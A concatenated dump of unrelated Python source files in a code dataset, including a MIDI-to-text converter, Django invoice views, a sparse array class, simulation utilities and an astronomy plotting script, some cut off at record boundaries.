stopwords.words(\"english\")]\r\n\r\n words = filter(lambda word: not word.lower() in stop_words, words)\r\n\r\n return TextBlob(\" \".join(words))\r\n\r\n\r\ndef find_noun_phrases(text_blob):\r\n \"\"\"Returns all noun phrases found in `text_blob`\"\"\"\r\n tags = text_blob.tags\r\n\r\n noun_phrases = []\r\n current_noun_phrase = []\r\n current_noun_phrase_pos = []\r\n\r\n # Find the noun phrases sequentially based on the POS tags\r\n\r\n for (word, pos) in tags:\r\n if re.match(\"^[a-zA-Z]*$\", word):\r\n if current_noun_phrase == [] or current_noun_phrase_pos[-1] == \"JJ\":\r\n if pos in [\"NN\", \"NNS\", \"NP\", \"NPS\", \"JJ\"]:\r\n current_noun_phrase.append(word)\r\n current_noun_phrase_pos.append(pos)\r\n else:\r\n if pos in [\"NN\", \"NNS\", \"NP\", \"NPS\"]:\r\n current_noun_phrase.append(word)\r\n current_noun_phrase_pos.append(pos)\r\n else:\r\n if ((len(current_noun_phrase) == 1 and not current_noun_phrase_pos[0] == \"JJ\")\r\n or len(current_noun_phrase) > 1):\r\n noun_phrases.append(\" \".join(current_noun_phrase))\r\n current_noun_phrase = []\r\n current_noun_phrase_pos = []\r\n\r\n return noun_phrases\r\n\r\n\r\ndef link_noun_phrases(text_blob):\r\n \"\"\"Returns a `TextBlob` with all noun phrases in `text_blob` linked by underscores\"\"\"\r\n #noun_phrases = text_blob.noun_phrases\r\n noun_phrases = find_noun_phrases(text_blob)\r\n\r\n # Sort the noun phrases by occurences of spaces so we replace those first\r\n noun_phrases = sorted(noun_phrases, reverse=True,\r\n key=lambda np: np.count(\" \"))\r\n\r\n # Select only noun phrases that don't consist of single words (ie. at least a space or hyphen)\r\n # Replace all spaces with underscores and remove hyphens\r\n\r\n replacements = [(np, np.replace(\" \", \"_\").replace(\"-\", \"\")) for np in\r\n filter(lambda word: word.count(\" \") > 0 or word.count(\"-\") > 0, noun_phrases)]\r\n\r\n text_blob_str = str(text_blob)\r\n\r\n for noun_phrase, joined_noun_phrase in replacements:\r\n text_blob_str = text_blob_str.replace(noun_phrase, joined_noun_phrase)\r\n\r\n return TextBlob(text_blob_str)\r\n\r\n\r\ndef convert_wiki_dump(wiki_dump_path, out_path, wiki_extractor_path):\r\n \"\"\"Converts a wikipedia dump at `wiki_dump_path` to multiple text files\r\n saved to `out_path` using the WikiExtractor.py script at `wiki_extractor_path`\"\"\"\r\n print(\"Extracting data from wikidump\")\r\n #os.system(\"python %s %s -b 1000M -q -o %s\" %\r\n # (wiki_extractor_path, wiki_dump_path, out_path))\r\n\r\n print(\"Converting xml to text files\")\r\n _split_wiki_articles(out_path, out_path)\r\n\r\n\r\ndef _get_wiki_article_title(article):\r\n \"\"\"This function finds the article name for an Wikipedia article\"\"\"\r\n title = re.findall(r\"(title=\\\")(.+?)(\\\")\", article)\r\n if len(title) == 0 or len(title[0]) <= 1:\r\n return None\r\n\r\n return title[0][1]\r\n\r\n\r\ndef _split_wiki_articles(raw_article_file_path, article_out_path):\r\n \"\"\"This script is used to split Wikipedia articles extracted from a Wikipedia\r\n dump into seperate files for every article\"\"\"\r\n wiki_files = glob(os.path.join(raw_article_file_path, \"AA\", \"wiki_*\"))\r\n print(\"Found\", len(wiki_files), \"files to process\")\r\n for raw_file_path in wiki_files:\r\n print(\"Processing\", raw_file_path)\r\n with open(raw_file_path, \"r\") as raw_file:\r\n articles = re.split(\" player_two_cards[-1].value:\r\n # Player One gets the cards\r\n player_one.add_card(player_one_cards)\r\n player_one.add_card(player_two_cards)\r\n at_war = False\r\n \r\n elif player_one_cards[-1].value < player_two_cards[-1].value:\r\n # Player One gets the cards\r\n player_two.add_card(player_one_cards)\r\n player_two.add_card(player_two_cards) \r\n at_war = False\r\n\r\n else:\r\n print(\"WAR!!\")\r\n # First check to see if player has enough cards\r\n \r\n if len(player_one.all_cards) < 5:\r\n print(\"Player One unable to play war! Game Over at War\")\r\n print(\"Player Two Wins! Player One Loses!\")\r\n game_on = False\r\n break\r\n \r\n elif len(player_two.all_cards) < 5:\r\n print(\"Player Two unable to play war! Game Over at War\")\r\n print(\"Player One Wins! Player One Loses!\")\r\n game_on = False\r\n break\r\n \r\n else:\r\n # Otherwise, we're still at war, so we'll add the next cards 5 cards as per some random rule set\r\n for num in range(5):\r\n player_one_cards.append(player_one.remove_one())\r\n player_two_cards.append(player_two.remove_one()) \r\n \r\n ","sub_path":"Card_Game_Using_Classes.py","file_name":"Card_Game_Using_Classes.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67042012","text":"class SparseArray:\n\n class Pair:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def __init__(self, size=0, default=None):\n self._default = default\n self._list = []\n self._size = size\n self._length = 0\n\n def __len__(self):\n return self._length\n\n def len(self):\n return self._length\n\n def size(self):\n return self._size\n\n def add(self, value):\n if self._length != self._size:\n if value != self._default:\n self._list.append(self.Pair(self._length, value))\n self._length += 1\n else:\n expr = \"SparseArray add(self, value) value = \" + str(value)\n raise OutOfArrayError(expr, \"OutOfArray Exception - Array is too small\")\n\n def getAt(self, index):\n if index > self._size-1:\n expr = \"SparseArray getAt(self, index) index = \" + str(index)\n raise OutOfArrayError(expr, \"OutOfArray Exception - Poinitng Out of an Array\")\n for pair in self._list:\n if index == pair.key:\n return pair.value\n return self._default\n\n def setAt(self, index, value):\n if index > self._size-1:\n expr = \"SparseArray setAt(self, index, value) index = \" + str(index) + \", value = \" + str(value)\n raise OutOfArrayError(expr, \"OutOfArray Exception - Poinitng Out of an Array\")\n for pair in self._list:\n if pair.key == index:\n if value == self._default:\n self._list.remove(pair)\n else:\n pair.value = value\n return\n if value != self._default:\n self._list.append(self.Pair (index, value))\n self._list.sort(lambda a, b: a.key > b.key)\n\nclass Error(Exception):\n pass\n\n\nclass OutOfArrayError(Error):\n def __init__(self, expr, msg):\n self.expr = expr\n self.msg = msg","sub_path":"SparseArray/IgorArray/SparseArray.py","file_name":"SparseArray.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"226651750","text":"# -*- coding: utf-8 -*-\n\n# django imports\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect, HttpResponse, Http404\nfrom django.template import RequestContext\n\n# django_regnskap imports\nfrom django_regnskap.faktura.models import *\nfrom django_regnskap.faktura.forms import FakturaBetaling\nfrom django_regnskap.faktura.views.fakturaPDF import generate_faktura_pdf\nfrom django_regnskap.regnskap.models import BilagDraft\n\n#general\nimport datetime\n\ndef betal_faktura(request, id):\n if request.method != 'POST':\n raise Exception('Wrong method')\n faktura = Faktura.objects.get(id = id)\n fb = FakturaBetaling(request.POST, prefix ='faktura_betaling' )\n if fb.is_valid() and fb.cleaned_data['faktura_id'] == faktura.id:\n fdata = fb.cleaned_data\n if faktura.getOutstanding() == fdata['belop']:\n bilag_text = u\"Faktura %s Betalt\" % (faktura.getNumber(),)\n faktura.status = 4 # Betalt\n else:\n bilag_text = u\"Faktura %s Delbetaling\" % (faktura.getNumber(),)\n bilag = Bilag(\n dato = fdata['date'],\n beskrivelse = bilag_text,\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt,\n registrerd_by = request.user,\n )\n bilag.related_instance = faktura\n bilag.save()\n i1 = Innslag(\n bilag = bilag,\n konto = fdata['innbetaling_konto'],\n belop = fdata['belop'],\n type = 0 #debit\n )\n i2 = Innslag(\n bilag = bilag,\n konto = faktura.mellomverende,\n belop = fdata['belop'],\n type = 1 #kredit\n )\n i1.save()\n i2.save()\n\n faktura.data['log'].append(u\"Betaling registrert (%s kr) %s av %s\"%(fdata['belop'],datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.save()\n \n return HttpResponseRedirect( '/faktura/show/'+str(faktura.id) )\n\ndef betal_faktura_draft(request, faktura_id, draft_id):\n if request.method != 'POST':\n raise Exception(\"Wrong method\")\n faktura = Faktura.objects.get(id = faktura_id)\n draft = BilagDraft.objects.get(id = draft_id)\n\n if faktura.getOutstanding() == draft.belop:\n bilag_text = u\"Faktura %s Betalt (%s)\" % (faktura.getNumber(),draft.beskrivelse)\n faktura.status = 4 # Betalt\n else:\n bilag_text = u\"Faktura %s Delbetaling (%s)\" % (faktura.getNumber(),draft.beskrivelse)\n\n bilag = Bilag(\n dato = draft.dato,\n beskrivelse = bilag_text,\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt,\n registrerd_by = request.user,\n )\n bilag.related_instance = faktura\n bilag.save()\n i1 = Innslag(\n bilag = bilag,\n konto = draft.konto,\n belop = abs(draft.belop),\n type = int(draft.belop <= 0) #debit == 0\n )\n i2 = Innslag(\n bilag = bilag,\n konto = faktura.mellomverende,\n belop = abs(draft.belop),\n type = int(draft.belop > 0) #kredit == 1\n )\n i1.save()\n i2.save()\n\n faktura.data['log'].append(u\"Betaling registrert (%s kr) %s av %s\"%(draft.belop,datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.save()\n draft.delete()\n\n return HttpResponseRedirect( '/faktura/show/'+str(faktura.id) )\n\n# Ikke ferdig!!\ndef kreditnota(request):\n if request.method != 'POST':\n raise Exception(\"Wrong method\")\n faktura = Faktura.objects.get(id = request.POST['faktura_id'])\n faktura.data['log'].append(u\"Kreditnota generert %s av %s\"%(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n\n bilag_ids = tuple([int(b.id) for b in faktura.bilags.all()])\n related_kontos = list(Konto.objects.bilagRelated(bilag_ids=bilag_ids))\n\n bilag = Bilag(\n dato = datetime.datetime.today(),\n beskrivelse = u\"Faktura %s kreditert (slettet/reversert)\" % (faktura.getNumber()),\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt,\n registrerd_by = request.user,\n )\n bilag.related_instance = faktura\n faktura.status\n for konto in related_kontos:\n i = Innslag(\n bilag = bilag,\n konto = konto,\n belop = abs(konto.getLoadedDebit()),\n type = int(konto.getLoadedDebit()<0)\n )\n\n# Ikke ferdig!\ndef purring(request, faktura_id):\n if request.method != 'POST':\n raise Exception(\"Wrong Method\")\n faktura = Faktura.objects.get(id = faktura_id)\n faktura.status = 2 # Purret\n faktura.data['log'].append(u\"Purring generert %s av %s\"%(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.save()\n return HttpResponseRedirect(faktura.get_absolute_url())\n\ndef show_faktura(request, id):\n faktura = Faktura.objects.get(id = id)\n faktura_betaling_form = FakturaBetaling(prefix='faktura_betaling', initial={'faktura_id':faktura.id, 'innbetaling_konto':faktura.template.innbetaling_konto_id})\n if faktura.status == 0: # Kladdet\n pass\n elif faktura.status == 1: # Sendt\n pass\n elif faktura.status == 2: # Purret\n pass\n elif faktura.status == 3: # Inkasso\n pass\n elif faktura.status == 4: # Betalt\n pass\n elif faktura.status == 5: # Slettet\n pass\n bilag_ids = tuple([int(b.id) for b in faktura.bilags.all()])\n related_kontos = list(Konto.objects.bilagRelated(bilag_ids=bilag_ids))\n return render_to_response('show.html',{\n 'faktura' : faktura,\n 'bilags': faktura.bilags.order_by('dato'),\n 'related_kontos': related_kontos,\n 'faktura_betaling_form':faktura_betaling_form,\n 'drafts': BilagDraft.objects.filter(prosjekt=faktura.prosjekt),\n },RequestContext(request))\n\ndef list_faktura(request,prosjekt):\n fakturas = Faktura.objects.filter(prosjekt__navn = prosjekt)\n status = fakturas\n return render_to_response('list.html',{\n 'fakturas' : fakturas.order_by('status','date'),\n 'prosjekt' : prosjekt,\n },RequestContext(request))\n\ndef list_vare(request, prosjekt):\n vares = Vare.objects.raw(\"\"\"SELECT v.*, SUM(fv.price*fv.ammount) AS totalPrice, SUM(fv.ammount) as totalAmmount, YEAR(f.date) as faktura_year FROM faktura_vare AS v LEFT JOIN `faktura_faktura_vare` AS fv ON v.id = fv.vare_id LEFT JOIN faktura_faktura AS f ON f.id = fv.faktura_id GROUP BY v.id, faktura_year ORDER BY faktura_year DESC, v.id\"\"\")\n return render_to_response('list_vare.html',{\n 'vares': vares,\n 'prosjekt' : prosjekt,\n },RequestContext(request))\n\ndef send_faktura(request):\n if request.method != 'POST':\n raise Exception('Wrong method')\n faktura = Faktura.objects.get(id = request.POST['faktura_id'])\n if faktura.status != 0: #kladdet\n raise Http404('Fakturaen har allerede blitt sendt')\n faktura.status = 1 #sendtm\n faktura.assignNumber()\n faktura.data['log'].append(\"Sendt: %s av %s\"% (datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.data['template'] = faktura.template.get_template_fields()\n bilag = Bilag(\n dato = faktura.date,\n beskrivelse = u\"Faktura %s-%s Sendt\" % (faktura.date.year, faktura.number),\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt\n )\n bilag.related_instance = faktura\n bilag.save()\n Innslag(\n bilag = bilag,\n konto = faktura.mellomverende,\n belop = faktura.totalPrice(),\n type = 0, # debit\n ).save()\n konto_cache = {} # summer opp varer som skal på samme konto\n for vare in faktura.fakturavare.all():\n if vare.konto.id in konto_cache:\n konto_cache[vare.konto.id].belop += vare.totalPrice()\n konto_cache[vare.konto.id].save()\n else:\n i = Innslag(\n bilag = bilag,\n konto = vare.konto,\n belop = vare.totalPrice(),\n type = 1, # kredit\n )\n i.save()\n konto_cache[vare.konto.id] = i\n faktura.save()\n bf = BilagFile(\n bilag = bilag\n )\n bf.saveFile(generate_faktura_pdf(faktura),u\"Faktura-%s.pdf\" % faktura.getNumber())\n bf.save()\n return HttpResponseRedirect( '/faktura/show/'+str(faktura.id) )\n","sub_path":"faktura/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105002076","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random as rnd\nimport numpy as np\nimport pandas as pd\n\ndef calc_direction(agent):\n if agent.x <= agent.min_x or agent.max_x <= agent.x or agent.y <= agent.min_y or agent.max_y <= agent.y:\n return rnd.random() * 180\n else:\n return rnd.random() * 360 # 向きを変える\n\ndef avoid_out_of_range(agent):\n if agent.x < agent.min_x:\n agent.x = agent.min_x\n agent.delta_x = 0\n if agent.y < agent.min_y:\n agent.y = agent.min_y\n agent.delta_y = 0\n if agent.max_x < agent.x:\n agent.x = agent.max_x\n agent.delta_x = 0\n if agent.max_y < agent.y:\n agent.y = agent.max_y\n agent.delta_y = 0\n index = [\"x\", \"t\", \"delta_x\", \"delta_y\"]\n list = [agent.x, agent.y, agent.delta_x, agent.delta_y]\n series = pd.Series(list, index = index)\n return series\n\n\ndef min_x(x, radius): # 住民エージェントの行動範囲を制限する\n min_x = x - radius\n if min_x <= 0:\n min_x = 0\n return min_x\n\ndef min_y(y, radius): # 住民エージェントの行動範囲を制限する\n min_y = y - radius\n if min_y <= 0:\n min_y = 0\n return min_y\n\ndef max_x(x, radius, map_size): # 住民エージェントの行動範囲を制限する\n max_x = x + radius\n if map_size < max_x:\n max_x = map_size\n return max_x\n\ndef max_y(y, radius, map_size): # 住民エージェントの行動範囲を制限する\n max_y = y + radius\n if map_size < max_y:\n max_y = map_size\n return max_y\n\ndef get_probability(parameter, num): # BDIによる確率\n if parameter <= 4:\n if num % 4 == 0:\n return 1\n elif parameter <= 7:\n if num % 3 == 0:\n return 2\n else:\n if num % 2 == 0:\n return 3\n return 0\n\ndef calc_motivation(ave, point): # 資産の多さに基づいて,パラメータの数値に影響を与える\n if ave + 500 <= point:\n return 1\n elif ave + 250 <= point:\n return 0.5\n elif point <= ave - 250:\n return -0.5\n elif point <= ave - 500:\n return -1\n return 0\n\ndef calc_direction(agent):\n if agent.x <= agent.min_x or agent.max_x <= agent.x or agent.y <= agent.min_y or agent.max_y <= agent.y:\n return rnd.random() * 180\n else:\n return rnd.random() * 360 # 向きを変える\n\n\ndef variation(): # ばらつきを持たせる変数を返す\n if rnd.randrange(10) % 2 == 0:\n return 1 + rnd.uniform(0, 0.2)\n else:\n return rnd.uniform(0, 0.8)\n","sub_path":"calculate_util.py","file_name":"calculate_util.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"642722511","text":"#!/usr/bin/env python3\n\"\"\"Demonstrate chevron's support for lambdas.\"\"\"\nimport textwrap\nfrom typing import Callable\n\nimport chevron\n\n\ndef main() -> None:\n \"\"\"Implement the business logic described in this module's docstring.\"\"\"\n template = \"\"\"\n Mustache supports lambdas. Lambdas are referenced in a template, and defined in the context\n object.\n\n When the compiler encounters a lambda-referencing section tag in a template, it passes the body\n of that section tag to the lambda without evaluating tags. So it is that a lambda can receive\n text like {{#echo}}{{#upper}}this{{/upper}}{{/echo}}.\n\n A lambda may transform the text it receives, e.g. by calling .upper() on\n {{#upper}}this{{/upper}} text.\n\n A lambda may also invoke a mustache compiler on the text it receives. So it is that the body of\n {{#eval}}{{#upper}}this{{/upper}}{{/eval}} is evaluated.\n \"\"\"\n\n def echo(text: str, render: Callable) -> str:\n \"\"\"Echo the given text.\"\"\"\n return text\n\n def evaluate(text: str, render: Callable) -> str:\n \"\"\"Evaluate the given text.\"\"\"\n return render(text)\n\n def upper(text: str, render: Callable) -> str:\n \"\"\"Upper-case the given text.\"\"\"\n return text.upper()\n\n template = textwrap.dedent(template).strip()\n data = {\"echo\": echo, \"eval\": evaluate, \"upper\": upper}\n print(chevron.render(template=template, data=data))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mustache/04-lambdas/chevron-lambda.py","file_name":"chevron-lambda.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626398448","text":"import fnmatch\nimport os\nimport argparse\nimport warnings\n\nimport mido\nfrom mido import MidiFile, MidiTrack\n\nimport music21\nfrom music21 import *\n\nimport numpy as np\nimport math\n\nfrom tqdm import tqdm\n\n\n\"\"\"Converts MIDI file to text\"\"\"\ndef midiToText(filename):\n\n tqdm.write('File: {}'.format(filename))\n\n # read from input filename\n mid = MidiFile(filename)\n\n tqdm.write('Length (sec): {}'.format(mid.length))\n tqdm.write('Ticks per beat: {}'.format(mid.ticks_per_beat)) # e.g. 96/480 per beat (crotchet)\n\n\n # check for muliple tempos (e.g. change in tempo halfway through piece)\n check_multiple_tempos = []\n\n # instantiate final tempo for piece\n tempo = 120\n\n \"\"\"\n What is a channel? vs What is a track?\n e.g.:\n • Track 1 contains the notes played by right hand with a piano voice on channel 0.\n • Track 2 contains the notes played by left hand with the same piano voice on channel 0, too.\n • Track 3 contains the bass voice on channel 1.\n • Track 4 contains a clarinet voice on channel 2.\n • Track 5 contains the drums on channel 9.\n \"\"\"\n\n for i, track in enumerate(mid.tracks):\n\n tqdm.write('Track {}: {}'.format(i, track.name))\n\n for msg in track:\n if msg.type == 'set_tempo': # Note: is_meta\n msg_bpm = mido.tempo2bpm(msg.tempo) # convert from microseconds to bpm (e.g. 500000 us to 120 bpm)\n msg_bpm_int = int(msg_bpm)\n if msg_bpm != msg_bpm_int:\n warnings.warn('Non-integer bpm: {} (tempo) -> {} (bpm)'.format(msg.tempo, msg_bpm))\n check_multiple_tempos.append(msg_bpm_int)\n\n if len(check_multiple_tempos) > 1:\n warnings.warn('Multiple tempos: {}'.format(check_multiple_tempos))\n tempo = check_multiple_tempos[0]\n \n elif len(check_multiple_tempos) == 0: # does this even happen?\n warnings.warn('No tempo: setting default 120')\n tempo = 120\n\n else: # only one tempo\n tempo = check_multiple_tempos[0]\n\n print('Tempo: {}'.format(tempo))\n\n\n # get total time of piece\n # mid.length returns total playback time in seconds\n length_in_ticks = mid.length/60*tempo*mid.ticks_per_beat #mido.second2tick(mid.length, ticks_per_beat=mid.ticks_per_beat, tempo=tempo)\n print(length_in_ticks)\n\n\n # contains arrays of messages (only notes) for each track\n messages_list = []\n\n for i, track in enumerate(mid.tracks):\n\n # create new nested list for each track\n messages_list.append([])\n\n for msg in track:\n\n if msg.type == 'note_on':\n messages_list[i].append(msg)\n\n elif msg.type == 'note_off':\n # convert to note_on with velocity=0\n new_msg = mido.Message('note_on', note=msg.note, velocity=0, time=msg.time)\n messages_list[i].append(new_msg)\n\n \n # remove empty lists\n messages_list = [track for track in messages_list if len(track) > 0]\n\n\n\n # group elements into similar delta times (e.g. time: [48, 0], [96, 0, 0, 0])\n\n grouped_messages_list = []\n for x, track in enumerate(messages_list):\n grouped_messages_list.append([])\n\n count = 0\n temp_count = 0\n while count < len(track):\n\n # add current msg (should be time ≠ 0)\n new_group = {\n 'group': [track[count]], \n 'time': track[count].time\n }\n \n # add one for current msg added at start\n count += 1\n\n # freeze current value of count\n temp_count = count\n\n # add all following msgs that are time = 0\n for i in range(len(track) - temp_count):\n\n msg = track[temp_count+i]\n if msg.time == 0:\n new_group['group'].append(msg)\n count += 1\n\n # break before next non-zero time\n else:\n break\n\n # append temp grouped msgs back to group_messages\n grouped_messages_list[x].append(new_group)\n\n\n\n \"\"\"\n Generation of text\n \n Set top track (lowest index) to be 'melody'\n With all other tracks to be 'accomp' where will be an integer starting from 0 (accompaniment)\n \n Note: Actual \"theoretical\" melody may cross over into other tracks (i.e. \"accompaniment\")\n \"\"\"\n\n # instantiate text list\n # [CLS] (classification) used for indicating start of input (using other model standards)\n result_list = ['[CLS]', 'tempo{}'.format(tempo), '[127]']\n\n\n # loop through grouped messages and check for delta time differences between tracks\n\n # to keep track of time passed during the piece\n current_wait_time_elapsed = 0\n time_embed_counter = 126\n time_embed_interval = math.ceil(length_in_ticks / 127) # rounding up - should prevent underflow of time i.e. [0] comes before end of piece\n\n while max(len(track) for track in grouped_messages_list) > 0:\n\n all_first_groups = []\n for t in grouped_messages_list:\n\n # if track is empty replace with None\n if len(t) == 0:\n all_first_groups.append(None)\n\n else:\n # use pop to remove from list\n all_first_groups.append(t.pop(0))\n \n # all first times - use None for empty tracks (already replaced with None above)\n all_first_times = [group['time'] if group is not None else None for group in all_first_groups]\n\n\n # get min times in all_first_times ignoring None\n min_dt = min(t for t in all_first_times if t is not None)\n\n # append wait\n if min_dt != 0:\n wait_text = 'wait:{}'.format(min_dt)\n result_list.append(wait_text)\n\n current_wait_time_elapsed += min_dt\n\n if time_embed_counter != 0:\n\n # check for insertion of wait (word) embedding\n if current_wait_time_elapsed > time_embed_interval:\n\n time_embed_multiple = current_wait_time_elapsed // time_embed_interval\n time_pushover = current_wait_time_elapsed - time_embed_interval * time_embed_multiple\n\n word_embedding = '[{}]'.format(time_embed_counter)\n result_list.append(word_embedding)\n\n current_wait_time_elapsed = time_pushover\n time_embed_counter -= time_embed_multiple\n\n # time_embed_counter cannot be 0 due to integer rounding\n\n for i, track_group in enumerate(all_first_groups):\n\n # check if None (no notes left in that track)\n if track_group is None:\n continue\n\n\n if all_first_times[i] == min_dt:\n for msg in track_group['group']:\n\n # convert from 1-88 to A4\n note = music21.note.Note(msg.note)\n note_name = note.nameWithOctave\n\n track_type = 'melody' if i == 0 else 'accomp{}'.format(i-1)\n new_text = '{track_type} v{vel} {note}'.format(track_type=track_type, vel=msg.velocity, note=note_name)\n\n result_list.append(new_text)\n\n\n elif all_first_times[i] > min_dt:\n\n time_difference = all_first_times[i] - min_dt\n\n # prepend filler wait to remaining track\n new_filler_group = {'group': all_first_groups[i]['group'], 'time': time_difference} # no need to .copy()\n grouped_messages_list[i].insert(0, new_filler_group)\n\n\n\n # Possible scenario: ONLY if at the start, one track has a rest e.g. time=96\n\n print('Final time embedding: {}'.format(time_embed_counter))\n result_list.append('[0]')\n result_list.append('[SEP]')\n\n result_string = ' '.join(result_list)\n\n return result_string\n\n\n\n# Testing purposes\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--file', '-f', help='midi filename')\n args = parser.parse_args()\n\n if args.file:\n print(midiToText(args.file))","sub_path":"midi2text/midi2text_split.py","file_name":"midi2text_split.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131196093","text":"'''\n\nWrite a function:\n\ndef solution(A)\nthat, given an array A of N integers, returns the smallest positive integer (greater than 0) that does not occur in A.\n\nFor example, given A = [1, 3, 6, 4, 1, 2], the function should return 5.\n\nGiven A = [1, 2, 3], the function should return 4.\n\nGiven A = [−1, −3], the function should return 1.\n\nWrite an efficient algorithm for the following assumptions:\n\nN is an integer within the range [1..100,000];\neach element of array A is an integer within the range [−1,000,000..1,000,000].\n\n'''\n\n# Solution\n\na = [1, 2, 3, 4]\n\n\ndef missint(a):\n cleana = sorted(set(a))\n a_max = max(cleana)\n\n lst = []\n\n for i in cleana:\n\n if i < 0:\n return (1)\n\n for i in range(1, a_max + 1):\n\n if i in cleana:\n continue\n else:\n lst.append(i)\n\n if not lst:\n print(a_max + 1)\n else:\n print(min(lst))\n\nmissint(a)","sub_path":"MissingIntegerCodility.py","file_name":"MissingIntegerCodility.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602620567","text":"#Plot the vlos velocity field of the RC, with and without subtracting the Solar motion\nimport os, os.path\nimport sys\nimport copy\nimport pickle\nimport numpy\nfrom galpy.util import bovy_plot, bovy_coords, save_pickles\nfrom matplotlib import pyplot\nfrom matplotlib import transforms\nimport apogee.tools.read as apread\nimport pixelize_sample\nfrom plot_2dkinematics import vlosgal, modelvlosgal\nfrom plot_psd import _ADDLLOGGCUT, \\\n _RCXMIN, _RCXMAX, _RCYMIN, _RCYMAX, _RCDX\ndef plot_rckinematics(plotfilename,subsun=False):\n #Set up 3 axes\n bovy_plot.bovy_print(fig_width=8.,axes_labelsize=14)\n axdx= 1./3.\n #APOGEE-RC observations\n tdy= (_RCYMAX-_RCYMIN+4.5)/(_RCXMAX-_RCXMIN+4.5)*axdx\n obsAxes= pyplot.axes([0.1,(1.-tdy)/2.,axdx,tdy])\n pyplot.sca(obsAxes)\n data= apread.rcsample()\n if _ADDLLOGGCUT:\n data= data[data['ADDL_LOGG_CUT'] == 1]\n #Cut\n indx= (numpy.fabs(data['RC_GALZ']) < 0.25)*(data['METALS'] > -1000.)\n data= data[indx]\n #Get velocity field\n pixrc= pixelize_sample.pixelXY(data,\n xmin=_RCXMIN-2.25,xmax=_RCXMAX+2.25,\n ymin=_RCYMIN-2.25,ymax=_RCYMAX+2.25,\n dx=_RCDX,dy=_RCDX)\n if subsun:\n vmin, vmax= 0., 250.\n pixrc.plot(lambda x: vlosgal(x),\n func=lambda x: numpy.fabs(numpy.median(x)),\n zlabel=r'$|\\mathrm{median}\\ V^{\\mathrm{GC}}_{\\mathrm{los}}|\\,(\\mathrm{km\\,s}^{-1})$',\n vmin=vmin,vmax=vmax)\n else:\n vmin, vmax= -75., 75.\n img= pixrc.plot('VHELIO_AVG',\n vmin=vmin,vmax=vmax,overplot=True,\n colorbar=False)\n resv= pixrc.plot('VHELIO_AVG',\n justcalc=True,returnz=True) #for later\n bovy_plot.bovy_text(r'$\\mathrm{typical\\ uncertainty\\!:}\\ 3\\,\\mathrm{km\\,s}^{-1}$',\n bottom_left=True,size=8.25)\n bovy_plot.bovy_text(r'$|Z| < 250\\,\\mathrm{pc}$',top_right=True,size=10.)\n pyplot.annotate(r'$\\mathrm{APOGEE\\!-\\!RC\\ data}$',\n (0.5,1.09),xycoords='axes fraction',\n horizontalalignment='center',\n verticalalignment='top',size=10.)\n pyplot.axis([pixrc.xmin,pixrc.xmax,pixrc.ymin,pixrc.ymax])\n bovy_plot._add_ticks()\n bovy_plot._add_axislabels(r'$X_{\\mathrm{GC}}\\,(\\mathrm{kpc})$',\n r'$Y_{\\mathrm{GC}}\\,(\\mathrm{kpc})$')\n #Colorbar\n cbaxes = pyplot.axes([0.1625,(1.-tdy)/2.+tdy+0.065,2.*axdx-0.195,0.02])\n CB1= pyplot.colorbar(img,orientation='horizontal',\n cax=cbaxes)#,ticks=[-16.,-8.,0.,8.,16.])\n CB1.set_label(r'$\\mathrm{median}\\ V_{\\mathrm{los}}\\,(\\mathrm{km\\,s}^{-1})$',labelpad=-35,fontsize=14.)\n #Now calculate the expected field\n xgrid= numpy.arange(_RCXMIN-2.25+_RCDX/2.,_RCXMAX+2.25+_RCDX/2.,_RCDX)\n ygrid= numpy.arange(_RCYMIN-2.25+_RCDX/2.,_RCYMAX+2.25+_RCDX/2.,_RCDX)\n xv,yv= numpy.meshgrid(xgrid,ygrid,indexing='ij')\n rs= numpy.sqrt(xv**2.+yv**2.)\n phis= numpy.arctan2(yv,xv)\n d,l= bovy_coords.rphi_to_dl_2d(rs/8.,phis)\n expec_vlos= numpy.empty((len(xgrid),len(ygrid)))\n for ii in range(len(xgrid)):\n for jj in range(len(ygrid)):\n expec_vlos[ii,jj]= modelvlosgal(rs[ii,jj],phis[ii,jj],l[ii,jj],\n vc=218.,vtsun=242.)\n modelAxes= pyplot.axes([0.03+axdx,(1.-tdy)/2.,axdx,tdy])\n pyplot.sca(modelAxes)\n xlabel=r'$X_{\\mathrm{GC}}\\,(\\mathrm{kpc})$'\n ylabel=r'$Y_{\\mathrm{GC}}\\,(\\mathrm{kpc})$'\n indx= True-numpy.isnan(resv)\n plotthis= copy.copy(expec_vlos)\n plotthis[numpy.isnan(resv)]= numpy.nan #turn these off\n bovy_plot.bovy_dens2d(plotthis.T,origin='lower',cmap='jet',\n interpolation='nearest',\n xlabel=xlabel,ylabel=ylabel,\n xrange=[_RCXMIN-2.25,_RCXMAX+2.25],\n 